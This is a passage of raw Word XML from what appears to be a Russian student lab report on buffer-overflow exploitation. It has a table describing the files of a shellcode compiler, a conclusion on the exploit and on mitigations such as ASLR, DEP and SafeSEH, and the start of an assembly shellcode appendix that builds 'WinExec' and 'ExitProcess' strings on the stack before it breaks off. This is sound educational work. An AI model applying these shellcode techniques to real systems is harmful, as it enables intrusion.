        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707D9E" w14:paraId="4A36C271" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ABF751F" w14:textId="55184DCB" w:rsidR="00707D9E" w:rsidRDefault="00302D43" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00302D43">
              <w:t>DeclaredFunctions.cpp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5DFCE700" w14:textId="5DED6958" w:rsidR="00707D9E" w:rsidRPr="00B04990" w:rsidRDefault="00E77ED5" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Определяется имя и библиотека функции, добавляемой в вектор. Генерируется вызов </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LoadLibrary</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> и </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GetProcAddress</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, строки при этом переводятся в </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>hex</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707D9E" w:rsidRPr="000C4924" w14:paraId="7AB2054F" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31CE41EB" w14:textId="206D3DD7" w:rsidR="00707D9E" w:rsidRDefault="00E70F32" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E70F32">
              <w:t>DeclaredFunctionsStates.cpp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50C3982E" w14:textId="717D8DFA" w:rsidR="00707D9E" w:rsidRPr="000C4924" w:rsidRDefault="000C4924" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Парсинг</w:t>
            </w:r>
            <w:r w:rsidRPr="000C4924">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>строки</w:t>
            </w:r>
            <w:r w:rsidRPr="000C4924">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>function</w:t>
            </w:r>
            <w:r w:rsidRPr="000C4924">
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>func</w:t>
            </w:r>
            <w:r w:rsidRPr="000C4924">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>dll</w:t>
            </w:r>
            <w:r w:rsidRPr="000C4924">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E70F32" w14:paraId="23667412" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="540FAE81" w14:textId="19EA1376" w:rsidR="00E70F32" w:rsidRPr="00E70F32" w:rsidRDefault="00E70F32" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E70F32">
              <w:t>DeclaredStates.cpp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78A66B11" w14:textId="2B5B317A" w:rsidR="00E70F32" w:rsidRDefault="00E3229F" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Сборка вместе параметров, имени и библиотеки функции</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E70F32" w14:paraId="04DEDDE9" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C7FAAFC" w14:textId="43F94BBE" w:rsidR="00E70F32" w:rsidRPr="00E70F32" w:rsidRDefault="00E70F32" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E70F32">
              <w:t>DLLBaseAddress.cpp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38CF5439" w14:textId="61FA6479" w:rsidR="00E70F32" w:rsidRPr="00A91AC2" w:rsidRDefault="00A91AC2" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Получение индекса базового адреса </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>kernel</w:t>
            </w:r>
            <w:r w:rsidRPr="00A91AC2">
              <w:t>32.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E70F32" w14:paraId="7B44A99D" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74F3E6E5" w14:textId="4DDB8280" w:rsidR="00E70F32" w:rsidRPr="00E70F32" w:rsidRDefault="00E70F32" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E70F32">
              <w:t>FunctionCalls.cpp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4BEDC252" w14:textId="201F0B1F" w:rsidR="00E70F32" w:rsidRPr="00A91AC2" w:rsidRDefault="00A91AC2" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Генерирует вызов функции для </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A91AC2">
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> В процессе генерации добавляется имя функции, проверка, существует ли она, добавления строчных либо целочисленных аргументов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E70F32" w14:paraId="6114F7ED" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="142BE679" w14:textId="792A5777" w:rsidR="00E70F32" w:rsidRPr="00E70F32" w:rsidRDefault="00E70F32" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E70F32">
              <w:t>FunctionOffsetAddress.cpp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73355BF0" w14:textId="36100866" w:rsidR="00E70F32" w:rsidRDefault="005E6E12" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Поиск и добавление сдвига функции в библиотеке</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E70F32" w14:paraId="7D04D859" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C78351B" w14:textId="686A70CE" w:rsidR="00E70F32" w:rsidRPr="00E70F32" w:rsidRDefault="00E70F32" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E70F32">
              <w:t>KeystoneLib.cpp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2A9A503C" w14:textId="44456A69" w:rsidR="00E70F32" w:rsidRDefault="005E6E12" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Для работы с </w:t>
            </w:r>
            <w:r w:rsidRPr="005E6E12">
              <w:t>KeystoneLib</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E70F32" w14:paraId="0ACBF02A" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DECC445" w14:textId="56768359" w:rsidR="00E70F32" w:rsidRPr="00E70F32" w:rsidRDefault="00E70F32" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E70F32">
              <w:t>LinuxSyscalls.cpp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3F32614F" w14:textId="150A3950" w:rsidR="00E70F32" w:rsidRPr="005D2601" w:rsidRDefault="005D2601" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Для работы с системными вызовами </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">ОС </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E70F32" w14:paraId="11E9A665" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CC93447" w14:textId="1B99D87B" w:rsidR="00E70F32" w:rsidRPr="00E70F32" w:rsidRDefault="00E70F32" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E70F32">
              <w:lastRenderedPageBreak/>
              <w:t>Platform.cpp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5DE76A66" w14:textId="31E0B847" w:rsidR="00E70F32" w:rsidRDefault="005D2601" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Определение и установка платформы компиляции</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E70F32" w14:paraId="4CEC7752" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="404920FB" w14:textId="7812B6C7" w:rsidR="00E70F32" w:rsidRPr="00E70F32" w:rsidRDefault="00E70F32" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E70F32">
              <w:t>ShellcodeCompiler.cpp</w:t>
            </w:r>
            <w:r w:rsidR="00553EBA">
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00553EBA"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508301E4" w14:textId="79FE7523" w:rsidR="00E70F32" w:rsidRPr="00DD0B48" w:rsidRDefault="00DD0B48" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Основной файл, содержащий main. Получает аргументы командной строки, вызывает процедуры парсинга и генерации шелл-кода</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E70F32" w14:paraId="4030468A" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26AA696B" w14:textId="7C756420" w:rsidR="00E70F32" w:rsidRPr="00E70F32" w:rsidRDefault="00E70F32" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E70F32">
              <w:t>SEHUtils.h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4786" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="729B0589" w14:textId="5C1DB039" w:rsidR="00E70F32" w:rsidRDefault="00FB20EF" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Обработка исключений</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB20EF" w14:paraId="20CDD87A" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="170EFA05" w14:textId="20E8AD0A" w:rsidR="00FB20EF" w:rsidRPr="00E70F32" w:rsidRDefault="00FB20EF" w:rsidP="00FB20EF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E70F32">
              <w:t>StringOffsetAddress.cpp</w:t>
            </w:r>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:r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349A5C25" w14:textId="62421DD1" w:rsidR="00FB20EF" w:rsidRDefault="00310CFA" w:rsidP="00FB20EF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Поиск и добавление смещения строки</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB20EF" w14:paraId="60A8A578" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13F67C6A" w14:textId="70EAC8B9" w:rsidR="00FB20EF" w:rsidRPr="00E70F32" w:rsidRDefault="00916747" w:rsidP="00FB20EF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E70F32">
              <w:t>Utils.cpp</w:t>
            </w:r>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:r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14:paraId="720FBBE8" w14:textId="2D4D19D7" w:rsidR="00FB20EF" w:rsidRDefault="00916747" w:rsidP="00FB20EF">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Различные утилиты для работы с файлами: чтение/запись ресурса</w:t>
            </w:r>
            <w:r w:rsidR="004236AD">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>/бинарного/ассемблерного файлов, некоторые функции работы со строками.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DE79146" w14:textId="77777777" w:rsidR="00707D9E" w:rsidRPr="00707D9E" w:rsidRDefault="00707D9E" w:rsidP="00707D9E"/>
    <w:p w14:paraId="6E76D318" w14:textId="77777777" w:rsidR="00085FB4" w:rsidRPr="0022399F" w:rsidRDefault="00085FB4" w:rsidP="00085FB4">
      <w:pPr>
        <w:pStyle w:val="afff1"/>
      </w:pPr>
      <w:r>
        <w:t>ВЫВОД</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B7675E" w14:textId="00F77CD5" w:rsidR="00E41021" w:rsidRDefault="00085FB4" w:rsidP="006F40AC">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>В ходе выполнения данной лабораторной работы был</w:t>
      </w:r>
      <w:r w:rsidR="007600BF">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">а произведена эксплуатация уязвимости переполнения буфера. Данная уязвимость становится возможной при использовании небезопасных функций </w:t>
      </w:r>
      <w:r w:rsidR="006F40AC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">и отсутствии достаточного количества проверок, которые могли бы нивелировать угрозу. Уязвимость становится ещё опаснее, если отсутствуют такие механизмы защиты как </w:t>
      </w:r>
      <w:r w:rsidR="006F40AC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidR="006F40AC" w:rsidRPr="006F40AC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006F40AC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r w:rsidR="006F40AC" w:rsidRPr="006F40AC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006F40AC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NXCompat</w:t>
      </w:r>
      <w:r w:rsidR="006F40AC" w:rsidRPr="006F40AC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006F40AC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SafeSEH</w:t>
      </w:r>
      <w:r w:rsidR="006F40AC" w:rsidRPr="006F40AC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E41021">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> С помощью подмены байт на граничные значения удалось вызвать исключение в уязвимой программе.</w:t>
      </w:r>
      <w:r w:rsidR="00E41021" w:rsidRPr="00E41021">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F40AC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Был реализован шелл-код на языке ассемблер</w:t>
      </w:r>
      <w:r w:rsidR="00667243">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, выполняющий сохранение сетевых настроек в файл</w:t>
      </w:r>
      <w:r w:rsidR="004E11F2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Также было проведено подробное изучение стека, его функциональности и назначения регистров.</w:t>
      </w:r>
      <w:r w:rsidR="00667243">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Кроме того, была изучена утилита для </w:t>
      </w:r>
      <w:r w:rsidR="00667243">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:r w:rsidR="00667243" w:rsidRPr="00667243">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00667243">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
      <w:r w:rsidR="00667243" w:rsidRPr="00667243">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00667243">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r w:rsidR="00667243" w:rsidRPr="00667243">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00667243">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidR="00667243" w:rsidRPr="00667243">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E41021">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B96877" w14:textId="43835275" w:rsidR="00E41021" w:rsidRPr="006958D0" w:rsidRDefault="00E41021" w:rsidP="00E41021">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="851"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение</w:t>
      </w:r>
      <w:r w:rsidRPr="006958D0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B6764C" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>format PE console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E50918" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>use32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749A9C22" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>entry start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A64A9F4" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D8DB2B" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>start:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445CDF2E" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EACA64" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>mov ebp, esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6340A1" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>sub esp, 40h    ; ???????? ?????? ??? ??????????</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB36CAE" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075D235C" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>xor esi, esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B22333A" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A13F165" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 63h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A206172" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push word 6578h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07471D45" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 456E6957h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3AA526" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00707D9E" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:t>ebp</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:t xml:space="preserve">-4], </w:t>
      </w:r>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:t xml:space="preserve">    ; </w:t>
      </w:r>
      <w:r w:rsidRPr="003056F6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Загружаем</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003056F6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>строку</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>WinExec</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003056F6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003056F6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>сохраняем</w:t>
      </w:r>
      <w:r w:rsidRPr="00707D9E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003056F6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ее</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADE8EC7" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRPr="00707D9E" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07183852" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>xor esi, esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473554F7" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640963E4" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 73h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574A0BB3" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push word 7365h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAFC51E" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 636F7250h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4829E9BD" w14:textId="77777777" w:rsidR="00C3504B" w:rsidRDefault="00C3504B" w:rsidP="00C3504B">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>push 74697845h</w:t>
      </w:r>
    </w:p>
